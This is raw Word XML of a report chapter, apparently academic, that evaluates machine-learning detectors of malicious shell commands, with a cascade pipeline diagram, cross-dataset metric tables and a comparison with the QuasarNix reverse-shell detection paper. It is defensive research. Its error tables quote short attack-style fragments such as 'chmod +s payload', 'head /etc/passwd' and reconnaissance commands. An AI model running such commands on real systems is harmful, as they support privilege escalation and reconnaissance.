      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Every tuple below is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(value, F1, FPR)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The paired figures </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch7_sensitivity_xgboost.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch7_sensitivity_cnn.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plot these curves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Scope caveat.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Both sweeps were run on a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>5000-row training subsample</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>n_train = 5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">) to keep the OAT grid affordable. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>rankings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>qualitative shapes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> reported here are the intended takeaway; absolute F1/FPR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>magnitudes — and especially the settings that flirt with overfitting (deep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>trees, low dropout, aggressive learning rates) — should be re-confirmed on the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>full training corpus before being locked in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Pipeline architecture (Figure 7.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The hyperparameters tuned in this chapter feed the 3-stage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cascade detector</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Ch. 8.4): raw commands enter a cheap Isolation-Forest bulk filter, survivors go to the tuned XGBoost-hybrid, and only genuine edge cases reach the LLM.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flowchart TD</w:t>
        <w:br/>
        <w:t xml:space="preserve">    IN(["Raw shell command string"]) --&gt; S1["Stage 1 · Isolation Forest&lt;br/&gt;(unsupervised anomaly score)"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    S1 --&gt; D1{"score below&lt;br/&gt;calibrated threshold?"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D1 --&gt;|"yes"| B1(["BENIGN — cleared&lt;br/&gt;(bulk benign filter)"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D1 --&gt;|"no (anomalous)"| S2["Stage 2 · XGBoost-hybrid&lt;br/&gt;P(attack)"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    S2 --&gt; D2{"P(attack)?"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D2 --&gt;|"0.65 – 1.00"| A1(["ATTACK&lt;br/&gt;(high confidence)"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D2 --&gt;|"0.00 – 0.35"| B2(["BENIGN&lt;br/&gt;(high confidence)"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D2 --&gt;|"0.35 – 0.65&lt;br/&gt;(edge case)"| S3["Stage 3 · LLM arbitration&lt;br/&gt;(Llama 3.1-8B)"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    S3 --&gt; D3{"final verdict"}</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D3 --&gt;|"malicious"| A2(["ATTACK"])</w:t>
        <w:br/>
        <w:t xml:space="preserve">    D3 --&gt;|"benign"| B3(["BENIGN"])</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    classDef attack fill:#f8d7da,stroke:#c0392b,color:#000</w:t>
        <w:br/>
        <w:t xml:space="preserve">    classDef benign fill:#d4edda,stroke:#27ae60,color:#000</w:t>
        <w:br/>
        <w:t xml:space="preserve">    classDef stage fill:#e7f0fb,stroke:#2a6fb0,color:#000</w:t>
        <w:br/>
        <w:t xml:space="preserve">    class A1,A2 attack</w:t>
        <w:br/>
        <w:t xml:space="preserve">    class B1,B2,B3 benign</w:t>
        <w:br/>
        <w:t xml:space="preserve">    class S1,S2,S3 stage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Figure 7.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Three-stage cascade detector. Stage 1 (Isolation Forest) clears bulk benign traffic below an anomaly threshold auto-calibrated to retain 99% of attacks; stage 2 (XGBoost-hybrid) settles the high-confidence bands — P(attack) &gt; 0.65 → attack, &lt; 0.35 → benign; only the 0.35–0.65 edge band reaches stage 3 (LLM arbitration, Llama 3.1-8B). Standalone source: [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch7_pipeline_diagram.md</w:t>
      </w:r>
      <w:r>
        <w:t>](ch7_pipeline_diagram.md).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>7.2 Class-imbalance strategy and leakage control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Both corpora are deliberately imbalanced at 1 attack : 3 benign (25% positive), so a detector that flags everything scores only F1 = 0.400 — the do-nothing floor every result is measured against. The pipeline counters this </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cost-sensitively rather than by resampling</w:t>
      </w:r>
      <w:r>
        <w:t>, applied identically across models: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XGBoost / XGBoost-hybrid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>scale_pos_weight</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = train-fold negative/positive ratio, so a missed attack costs the loss as much as three false alarms.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Random Forest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>class_weight="balanced_subsample"</w:t>
      </w:r>
      <w:r>
        <w:t>, re-weighting the Gini split criterion per bootstrap.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1D-CNN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — class-weighted cross-entropy at the same ratio.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Isolation Forest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — fit on benign rows only, so class prior does not apply; its operating point is set by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>stage1_retain_recall</w:t>
      </w:r>
      <w:r>
        <w:t>, not by resampling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cost-sensitive weighting is preferred over SMOTE because the positive class is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>semantically diverse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (reverse shells, download cradles, enumeration bursts), not merely under-sampled noise — synthesising interpolated "average attacks" would blur the very feature conjunctions the models depend on. The pipeline stays SMOTE-ready: any sampler lives inside an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>imbalanced-learn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Pipeline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, fit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>on the training fold only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within each CV split and never on the test fold — the same leakage-safe contract that governs the scaler (Chapter 5.3).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.2 — Cross-dataset variance (all 5 registry models)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>In-distribution (train and test on the same dataset's splits) and cross-dataset transfer. Diagonal = in-distribution; off-diagonal = transfer. Metrics at threshold 0.5.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model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train → test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Accuracy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Recall/DR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FPR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F1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ROC-AUC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xgboost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dataset1→dataset1 (in-dist)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0.893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0.785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0.786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0.072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0.786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0.932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xgboost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dataset1→dataset2 (transfer)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0.662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0.395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0.662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0.338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0.495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0.722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xgboost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dataset2→dataset1 (transfer)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0.750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0.500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0.154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0.051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0.235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0.597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xgboost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dataset2→dataset2 (in-dist)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0.878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0.756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0.756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0.081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0.756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0.930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xgboost_hybrid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dataset1→dataset1 (in-dist)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0.938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0.875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0.877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0.042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0.876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0.979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xgboost_hybrid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dataset1→dataset2 (transfer)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0.709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0.445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0.662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0.276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0.532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0.767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xgboost_hybrid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dataset2→dataset1 (transfer)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0.779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0.766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0.168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0.017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0.276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0.686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xgboost_hybrid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dataset2→dataset2 (in-dist)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0.924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0.851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0.846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0.049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0.848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0.968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cnn1d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dataset1→dataset1 (in-dist)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0.929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0.841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0.881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0.056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0.860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0.975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cnn1d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dataset1→dataset2 (transfer)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0.703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0.441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0.697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0.295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0.540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0.770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cnn1d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dataset2→dataset1 (transfer)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0.792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0.787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0.232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0.021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0.359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0.733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cnn1d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dataset2→dataset2 (in-dist)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0.916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0.812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0.866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0.067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0.838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0.964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random_forest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dataset1→dataset1 (in-dist)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0.907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0.878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0.728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0.034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0.796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0.940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random_forest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dataset1→dataset2 (transfer)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0.752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0.504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0.526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0.173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0.515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0.720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random_forest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dataset2→dataset1 (transfer)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0.753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0.534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0.083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0.024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0.143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0.662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random_forest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dataset2→dataset2 (in-dist)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0.886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0.819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0.697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0.052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0.753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0.937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isolation_forest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dataset1→dataset1 (in-dist)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0.781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0.860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0.146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0.008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0.249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0.812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isolation_forest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dataset1→dataset2 (transfer)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0.760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0.656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0.084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0.015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0.148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0.677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isolation_forest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dataset2→dataset1 (transfer)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0.779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0.843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0.140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0.009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0.241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0.787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isolation_forest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dataset2→dataset2 (in-dist)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0.762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0.731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0.079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0.010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0.143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0.677</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 7. Cross-dataset performance of all five models (in-domain and both transfer directions) across Accuracy, Precision, Recall/DR, FPR, F1, and ROC-AUC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Reading the table (diagnosis seed):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a large diagonal→off-diagonal drop is either </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Environmental Distribution Shift</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (curated Dataset 1 vs real honeypot Dataset 2 — different attack surface form) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Model Overfitting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the training source. The asymmetry (D1→D2 vs D2→D1) tells them apart: if D1→D2 &gt;&gt; D2→D1, the curated set has broader coverage and the honeypot model is narrow (overfit), not just shifted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8.3 — Comparison vs. the Trizna ("TOPS") Paper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40" w:lineRule="auto" w:line="360"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The assigned TOPS paper is Trizna, D., Demetrio, L., Biggio, B., &amp; Roli, F. (2026), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Robust Large-Scale Detection of Living-Off-the-Land Reverse Shells via Data Synthesis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, ACM TOPS, DOI: 10.1145/3807450 (arXiv:2402.18329). This is the QuasarNix paper — its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>quasarnix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> corpus is one of our own attack sources. The comparison below also references Trizna's earlier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>SLP paper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> (arXiv:2107.02438, CAMLIS 2021) where relevant. Our own numbers are from [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>results/summary.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>](../results/summary.json) and the forensics in [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>report/ch8_findings.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>](ch8_findings.md).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Error-profile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Failure mode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Trizna-style model (seq2seq anomaly detector / QuasarNix)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Our XGBoost-hybrid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Our 1D-CNN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Overt attacks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (reverse shells, dropper cradles)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Caught reliably.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> QuasarNix's entire design goal is robust detection of reverse shells; a seq2seq model flags them as high-reconstruction-error outliers.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Caught reliably</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>quasarnix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0/58 and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>payloads</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 0/15 false negatives.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Caught reliably</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — same 0-FN pattern on the overt-attack sources.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Benign-looking LotL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (recon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr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sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, GTFOBins-style escapes, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chmod +s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>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Missed.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> These </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>are</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> "normal" sequences, so an anomaly model assigns them low error and passes them through — the model's structural blind spot.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Missed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — FN concentrate in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (18%), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>atomic_red_team</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (14%), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>gtfobins</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (8%); worst FNs are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apt-get changelog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chmod +s payload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last | tail</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.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Missed</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — the same class (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hacktricks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 11%, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>gtfobins</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10%); worst FNs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pkaction --verbose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aptitude changelog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Rare-but-benign / unusual legitimate syntax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False alarm.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> Novelty ≠ maliciousness: an anomaly detector fires on any unusual-but-legitimate one-liner, its dominant false-positive mode.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False alarm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> on dual-use admin — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>linlm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 17% FP (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sudo iptables …</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bash6k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 13% (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>chsh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head /etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">), </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 10% (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>find … -exec</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>).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False alarm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> on the same but far more often (173 FP vs 100), tilted toward templated </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr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find</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> pipelines (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nl2bash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 16%, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>linlm</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> 25%).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Distribution shift / novel corpus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Fails without augmentation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — QuasarNix's headline finding: non-augmented models do not generalize.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Fails</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — transfer collapse (below).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Fails, but least badly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — best cross-dataset transfer of any model.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Adversarial evasion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Explicitly studied</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> — QuasarNix builds black-box evasion attacks and adversarially robust defenses.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Untested</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (a gap in our work).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Untested</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> (a gap in our work).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Total in-domain errors (D1, full-train)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94 FN / 95 FP (F1 0.876)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91 FN / 127 FP (F1 0.860)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:lineRule="auto" w:line="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Table 8. Error-profile comparison of failure modes: a Trizna-style anomaly detector vs. our XGBoost-hybrid and 1D-CNN.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The striking result is that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>two failure classes that matter are model-independent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: whether the detector is a supervised tree, a character CNN, or a seq2seq anomaly model, it misses benign-looking LotL and false-alarms on unusual-but-benign administration. That is not a modeling deficiency — it is the label boundary. Our XGBoost-hybrid and CNN differ only in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
